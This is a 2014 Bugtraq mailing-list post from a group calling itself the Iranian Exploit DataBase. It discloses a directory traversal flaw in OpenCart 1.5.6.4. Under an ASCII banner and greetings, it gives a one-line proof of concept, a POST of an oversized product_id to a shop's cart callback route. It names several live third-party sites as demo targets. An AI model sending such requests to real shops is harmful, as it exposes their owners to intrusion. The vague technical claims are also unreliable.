
Date: Thu, 29 May 2014 13:40:54 GMT
From: iedb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: OpenCart 1.5.6.4 Directory Traversal Vulnerability

Directory Traversal Vulnerability In OpenCart 1.5.6.4 and old version



#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#
#####################################
#####################################

#         Iranian Exploit DataBase

# OpenCart 1.5.6.4 Directory Traversal Vulnerability

# Test on OpenCart 1.5.6.4 And old Version

# Vendor site : http://www.opencart.com

# Author : IeDb

# Site : Www.IeDb.Ir/acc   -   Www.IrIsT.Ir

# Fb Page : https://www.facebook.com/iedb.ir

# Greats : Bl4ck M4n - ErfanMs - TaK.FaNaR  - N20 - Bl4ck N3T - dr.koderz - Enddo - E1.Coders - Behnam Vanda
# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - 0x0ptim0us - 0Day
# Security - ARTA - ARYABOD - Mr.Time - C0dex - Dj.TiniVini - Det3cT0r - yashar shahinzadeh
#  Khashayar - tootro20 - AmirMasoud And All Members In IeDb.Ir/acc

#####################################

Using the POST parameters, you can find directory sites.

Example :

POST parameters In live http

http://shop.golrangmedia.com/index.php?route=tb/cartCallback


post : product_id=1111111

Image : http://iedb.ir/up/imagef-140139785162051-jpg.html

Other demo :

http://opencart-theme.ir/theme-demo/20/
http://digitalkey.ir/
http://www.goatboy.us/
http://themeglobal.com/opencart/caramella


#####################################
#  Archive Exploit = http://www.iedb.ir/exploits-1731.html
#####################################
